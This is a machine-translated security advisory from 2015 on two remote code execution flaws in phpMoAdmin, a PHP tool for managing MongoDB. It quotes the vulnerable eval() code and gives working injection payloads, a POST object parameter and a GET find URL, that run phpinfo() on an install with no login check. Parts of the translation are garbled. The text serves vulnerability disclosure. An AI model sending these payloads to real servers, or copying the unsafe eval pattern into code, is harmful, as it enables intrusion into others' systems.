PhpMoAdmin vulnerability analysis report-vulnerability warning-the black bar safety net

ID MYHACK58:62201559587
Type myhack58
Reporter 佚名
Modified 2015-03-04T00:00:00


phpMoAdmin is a convenient online MongoDB management tool that can be used to create, delete and modify databases and indexes, view and data search tool that provides database startup time and memory statistics, support for JSON format data import and export the php application.

Recently named sp1nlock hack published phpmoadmin an arbitrary code execution vulnerability, the vulnerability could lead to the use of the management program of the user is compromised.

By Ali attack and Defense laboratory researcher after a simple analysis, in this application find another similar remote code execution vulnerability(0day) in.


0x01 has been disclosed vulnerability analysis

漏洞 文件 moadmin.php no verify the login permissions.

public function __construct () {.... Omit the number of rows... $action = (isset($_GET['action']) ? $_GET['action'] : 'listCollections'); if (isset($_POST['object'])) { //pass object parameters passed if (self::$model->saveObject($_GET['collection'], $_POST['object'])) //incoming saveObject function, leading to code vulnerabilities{ return $this->_dumpFormVals();

saveObject function:

public function saveObject($collection, $obj) { eval('$obj=' . $obj . ';'); //$obj controllable parameters, passed to the Eval implementation return $this->mongo->selectCollection($collection)->save($obj);


0x02 use

By post pass object=1;phpinfo();


0x03 0day analysis

The program there is an additional a arbitrary code execution vulnerability, position 5 5 2-5 5 7 row listRows function


public function listRows($collection) { foreach ($this->sort as $key => $val) { //cast vals to int $sort[$key] = (int) $val; } $col = $this->mongo->selectCollection($collection); $find = array(); if (isset($_GET['find']) && $_GET['find']) {//the get method of the incoming find the variable $_GET['find'] = trim($_GET['find']); if (strpos($_GET['find'], 'array') === 0) {//$find simple to determine whether a variable is in the array at the beginning, is really the into the vulnerability position eval('$find = ' . $_GET['find'] . ';');//Incoming eval arbitrary code to be executed } else if (is_string($_GET['find'])) { if ($findArr = json_decode($_GET['find'], true)) { $find = $findArr; } } }

0x04 0day exploit

There is no comparison of nutrition readily search it out 2 eval safe pulse small Edit on the direct write. http://ip/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;


【Original: Alibaba security research lab–conqu3r SP xiaobian finishing the release】